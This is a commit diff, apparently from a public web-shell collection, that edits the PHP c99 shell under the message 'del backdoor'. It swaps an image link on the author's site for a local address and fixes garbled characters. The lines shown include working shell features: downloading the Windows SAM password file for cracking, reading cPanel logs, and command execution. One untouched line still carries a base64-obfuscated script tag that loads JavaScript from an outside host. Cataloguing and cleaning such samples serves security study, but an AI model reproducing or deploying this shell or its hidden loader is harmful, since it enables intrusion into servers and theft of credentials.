del bakcdoor @WHK102 👍

del backdoor 
look : https://github.com/tennc/webshell/issues/23

web-malware-collection-13-06-2012/PHP/c99.txt

@@ -694,7 +694,7 @@ function mysql_query_form()
   if ($tbl_struct)
   {
    echo "<td valign=\"top\"><b>Fields:</b><br>";
-   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "<EFBFBD> <a href=\"#\" onclick=\"document.N3tsh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.N3tsh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
    echo "</td></tr></table>";
   }
  }
@@ -1003,7 +1003,7 @@ if ($act == "sql")
    {
     echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
     $c = 0;
-    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b><EFBFBD>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
     if (!$c) {echo "No tables found in database.";}
    }
   }
@@ -1299,7 +1299,7 @@ if ($act == "sql")
        $i++;
       }
       echo "<tr bgcolor=\"000000\">";
-      echo "<td><center><b><EFBFBD></b></center></td>";
+      echo "<td><center><b>»</b></center></td>";
       echo "<td><center><b>".$i." table(s)</b></center></td>";
       echo "<td><b>".$trows."</b></td>";
       echo "<td>".$row[1]."</td>";
@@ -1528,7 +1528,7 @@ if ($act == "security")
  {
   $v = $_SERVER["WINDIR"]."\repair\sam";
   if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
-  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ <EFBFBD>.</font></b><br>";}
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
  }
  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
@@ -3012,7 +3012,7 @@ else
  }
  exit;
 }
-if ($act == "about") {echo "<center>Undetectable version by <br> Spyn3t <br> <img src=\"http://emp3ror.com/images/emplogo1.gif\"></center>";}
+if ($act == "about") {echo "<center>Undetectable version by <br> Spyn3t <br> <img src=\"http://1217.0.0.1/test.gif\"></center>";}
 ?>
 </td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
 <tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <?php echo base64_decode('PFNDUklQVCBTUkM9JiN4NjgmI3g3NCYjeDc0JiN4NzAmI3gzYSYjeDJmJiN4MmYmI3g3NyYjeDc3JiN4NzcmI3gyZSYjeDZjJiN4NmYmI3g2MyYjeDYxJiN4NmMmI3g3MiYjeDZmJiN4NmYmI3g3NCYjeDJlJiN4NmUmI3g2NSYjeDc0JiN4MmYmI3g2OSYjeDYyJiN4NmUmI3g2NSYjeDZjJiN4NjUmI3g3MiYjeDJmJiN4NzkmI3g2MSYjeDdhJiN4MmUmI3g2YSYjeDczPjwvU0NSSVBUPiANCg==');?><a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>